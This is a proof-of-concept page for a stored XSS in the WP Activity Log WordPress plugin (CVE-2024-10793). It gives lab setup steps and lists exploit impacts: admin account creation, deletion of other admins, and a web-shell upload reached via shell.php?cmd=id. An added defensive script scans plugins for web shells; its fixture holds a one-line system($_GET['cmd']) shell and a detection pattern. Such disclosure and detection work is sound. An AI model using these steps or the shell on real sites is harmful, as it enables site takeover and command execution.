PoC details: 893ea0d2cc185dbfd5425d2152cb19540c97b75d

Source
Related vulnerability
Title: WordPress plugin WP Activity Log cross-site scripting vulnerability (CVE-2024-10793)
Description: WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform written in PHP that runs on servers with PHP and MySQL; WordPress plugins are add-ons for it. The WP Activity Log plugin for WordPress, versions 5.2.1 and earlier, contains a cross-site scripting vulnerability: a stored XSS reachable through the user_id parameter.
Introduction
# CVE-2024-10793 PoC


Add these lines to your `hosts` file:
```
127.0.0.1  goodcms.lab
127.0.0.1  attacker.com
```


Launch WordPress with Docker:
```shell
$ sudo systemctl start docker
$ sudo docker-compose up -d
```


Open http://goodcms.lab:2121 and complete the WordPress installation steps.
Install WP Activity Log (wp-security-audit-log) 5.2.1 or an older version into WordPress.


Launch the attacker server:
```shell
$ php -S 0:9091 -t ./exploit
```


Deliver http://attacker.com to the victim (the impacts below assume the victim is a logged-in administrator) and the exploit fires.

Exploit impacts:
- Add a privileged user.
- Change the current administrator's profile.
- Delete all administrators except the attacker's account.
- Upload a web shell (packaged as a plugin).
- Log the victim out.


![alt text](./images/PoC.png)


Account takeover and privileged-user creation PoC:
Attacker credentials created by the exploit: { email: amin@attacker.com, username: amin, password: 123456 } (configurable in xpl.js).

Run a shell command through the uploaded web shell:
http://goodcms.lab:2121/wp-content/plugins/sogrid/shell.php?cmd=id

![alt text](./images/shell-PoC.png)
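The web shell above ends up as a bare PHP file in a plugin directory (wp-content/plugins/sogrid/shell.php), which is the artifact a defender or a lab operator should look for afterwards. The script below is an added post-exploitation check, not code from the PoC repository: it walks wp-content/plugins and flags plugin directories with no top-level PHP file carrying a `Plugin Name:` header, and any PHP file that feeds a request parameter straight into a command-execution function. The fixture it builds for a dry run (`example-plugin/`, and `sogrid/shell.php` containing `system($_GET["cmd"])`) is constructed here; the README only shows the `?cmd=id` request, not the shell's source, and both heuristics are assumptions rather than WordPress guarantees.

```shell
#!/bin/sh
# Added example (not from the PoC repository): hunt for web shells dropped into
# wp-content/plugins, the post-exploitation artifact this PoC leaves behind.
# Two heuristics, both assumptions rather than WordPress guarantees:
#   1. a genuine plugin directory has a top-level .php file with a "Plugin Name:"
#      header; the PoC's sogrid/shell.php has none.
#   2. a .php file that feeds a request parameter ($_GET/$_POST/$_REQUEST/$_COOKIE)
#      straight into system/passthru/shell_exec/exec/popen is a command shell.

CMD_EXEC_RE='(system|passthru|shell_exec|exec|popen)[[:space:]]*\([[:space:]]*\$_(GET|POST|REQUEST|COOKIE)\['

# scan_plugins WP_ROOT: print one "suspicious: <path> (<reason>)" line per finding.
scan_plugins() {
    plugins_dir="$1/wp-content/plugins"
    if [ ! -d "$plugins_dir" ]; then
        echo "no plugins directory under $1" >&2
        return 2
    fi
    for dir in "$plugins_dir"/*/; do
        [ -d "$dir" ] || continue          # glob matched nothing
        dir=${dir%/}
        # 1. no plugin header in any top-level PHP file of this directory
        if ! grep -q 'Plugin Name:' "$dir"/*.php 2>/dev/null; then
            echo "suspicious: $dir (no 'Plugin Name:' header in any top-level PHP file)"
        fi
        # 2. request input passed to a command-execution function, anywhere below
        find "$dir" -name '*.php' -exec grep -Eq "$CMD_EXEC_RE" {} \; -print |
        while read -r f; do
            echo "suspicious: $f (request parameter passed to command execution)"
        done
    done
}

# make_fixture ROOT: constructed WordPress tree for a dry run. example-plugin/ is a
# hypothetical legitimate plugin; sogrid/shell.php uses the path from the README,
# but its body is assumed (the README shows only the ?cmd=id request).
make_fixture() {
    mkdir -p "$1/wp-content/plugins/example-plugin" "$1/wp-content/plugins/sogrid"
    printf '<?php\n/*\nPlugin Name: Example Plugin\n*/\n' \
        > "$1/wp-content/plugins/example-plugin/example-plugin.php"
    printf '<?php system($_GET["cmd"]); ?>\n' > "$1/wp-content/plugins/sogrid/shell.php"
}

# Usage: sh scan-plugins.sh /var/www/html   (no argument: dry run on the fixture)
if [ -n "${1:-}" ]; then
    scan_plugins "$1"
else
    demo=$(mktemp -d)
    make_fixture "$demo"
    scan_plugins "$demo"
    rm -rf "$demo"
fi
```

Pass the WordPress document root (the directory containing wp-content) as the only argument; with no argument it builds the constructed tree, scans it and removes it. The header heuristic is deliberately noisy: a directory whose entry file lives one level down, or a leftover directory from a half-removed plugin, is flagged too, so treat each hit as something to inspect rather than as a confirmed shell. The command-execution check is the higher-confidence signal.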
File snapshot

```
[4.0K] /data/pocs/893ea0d2cc185dbfd5425d2152cb19540c97b75d
├── [2.1K] docker-compose.yml
├── [4.0K] exploit
│   ├── [1.5K] index.php
│   ├── [1.4M] shell.zip
│   └── [ 10K] xpl.js
├── [4.0K] images
│   ├── [187K] PoC.png
│   └── [ 30K] shell-PoC.png
├── [1.1K] LICENSE
├── [ 450] Makefile
├── [ 943] README.md
├── [1.6K] wp-auto-config.yml
└── [1.8M] wp-security-audit-log.5.2.1.zip

2 directories, 11 files
```